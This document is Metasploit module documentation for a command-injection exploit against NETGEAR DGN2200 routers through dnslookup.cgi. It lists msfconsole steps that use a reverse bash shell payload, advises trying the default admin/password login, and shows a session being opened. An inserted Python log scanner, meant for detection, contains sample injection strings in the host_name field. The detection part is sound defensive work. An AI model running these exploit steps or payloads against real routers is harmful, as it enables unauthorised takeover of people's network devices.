Vulnerable Application
NETGEAR DGN2200v1, DGN2200v2, DGN2200v3, DGN2200v4 routers
Verification Steps
- start msfconsole
- use exploit/linux/http/netgear_dnslookup_cmd_exec
- set RHOST 192.168.1.1 <--- Router IP
- set USERNAME xxxx (see the USERNAME option below)
- set PASSWORD xxxx (see the PASSWORD option below)
- set PAYLOAD cmd/unix/reverse_bash
- set LHOST 192.168.1.x
- set LPORT xxxx
- run
- Get a session
Options
USERNAME
The USERNAME option sets the username to authenticate the request with.
The command injection will not succeed if the username and password are not correct.
The default username for NETGEAR Routers is admin. If you don't know the credentials,
your best bet will be to use the default username and password.
PASSWORD
The PASSWORD option sets the password to authenticate the request with.
The command injection will not succeed if the username and password are not correct.
The default password for NETGEAR Routers is password. If you don't know the credentials,
your best bet will be to use the default username and password.
Advanced Options
HOSTNAME
The request is sent with a host_name POST parameter. This option sets that parameter.
The default is www.google.com. The parameter is needed because the file in which this
vulnerability is located (dnslookup.cgi) actually needs a domain to resolve, or else
the injection won't work.
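From the defender's side, the same fact is useful for detection: a legitimate request to dnslookup.cgi carries a host_name value that is a plain DNS name, so anything else in that parameter is worth an alert. The script below is an added example, not part of the Metasploit module or its documentation; it assumes a simplified, constructed log format ("client method path body") rather than any real NETGEAR log, and flags POST requests to /dnslookup.cgi whose decoded host_name is not a well-formed hostname.

```python
import re
from urllib.parse import parse_qs

# Constructed sample in a simplified "<client> <method> <path> <body>" form.
# Assumption: this is not a real router log format, only input for the demo.
SAMPLE_LOG = """\
192.168.1.9 POST /dnslookup.cgi host_name=www.google.com&lookup=Lookup
192.168.1.9 POST /dnslookup.cgi host_name=www.google.com%3Bid&lookup=Lookup
192.168.1.5 GET /index.htm -
192.168.1.9 POST /dnslookup.cgi host_name=www.google.com%60id%60&lookup=Lookup
192.168.1.7 POST /dnslookup.cgi host_name=mail.example.org&lookup=Lookup
"""

# A benign lookup target is a plain DNS name: labels of letters, digits and
# hyphens joined by dots. Shell metacharacters (";", "`", "|", "$(") or
# whitespace have no business in this parameter.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9-]{1,63}(\.[A-Za-z0-9-]{1,63})*\.?$"
)


def is_suspicious_host_name(value: str) -> bool:
    """True when the decoded host_name value is not a well-formed DNS name."""
    return HOSTNAME_RE.match(value) is None


def parse_line(line: str):
    """Split one constructed log line into (client, method, path, body)."""
    parts = line.split(" ", 3)
    if len(parts) != 4:
        return None
    return tuple(parts)


def scan_log(text: str) -> list:
    """Return (client, decoded host_name) for every POST to /dnslookup.cgi
    whose host_name parameter does not look like a DNS name."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        client, method, path, body = rec
        if method != "POST" or path != "/dnslookup.cgi":
            continue
        # parse_qs percent-decodes the body, so ";" and "`" become visible
        # even when the client URL-encoded them.
        for host_name in parse_qs(body).get("host_name", []):
            if is_suspicious_host_name(host_name):
                findings.append((client, host_name))
    return findings


if __name__ == "__main__":
    for client, value in scan_log(SAMPLE_LOG):
        print(f"suspicious dnslookup.cgi request from {client}: host_name={value!r}")
```

The check deliberately allow-lists the expected shape of the value instead of block-listing individual characters, so encoded or unusual injection syntax is caught as long as it is not a valid hostname; the same rule can be expressed in a WAF or IDS signature keyed on the dnslookup.cgi path.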
Scenarios
What it should look like against a vulnerable router.
msf > use exploit/linux/http/netgear_dnslookup_cmd_exec
msf exploit(netgear_dnslookup_cmd_exec) > options
Module options (exploit/linux/http/netgear_dnslookup_cmd_exec):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
PASSWORD                   yes       Password to authenticate with
Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
RHOST                      yes       The target address
RPORT     80               yes       The target port (TCP)
SSL       false            no        Negotiate SSL/TLS for outgoing connections
USERNAME                   yes       Username to authenticate with
VHOST                      no        HTTP server virtual host
Exploit target:
Id  Name
--  ----
0   NETGEAR DDGN2200 Router
msf exploit(netgear_dnslookup_cmd_exec) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(netgear_dnslookup_cmd_exec) > set USERNAME admin
USERNAME => admin
msf exploit(netgear_dnslookup_cmd_exec) > set PASSWORD password
PASSWORD => password
msf exploit(netgear_dnslookup_cmd_exec) > run
[*] Started reverse TCP double handler on 192.168.1.9:4444
[+] Router is a NETGEAR router (DGN2200v1)
[*] Sending payload...
[*] Command shell session 1 opened (192.168.1.9:4444 -> 192.168.1.9:53352) at 2017-03-02 19:36:47 -0500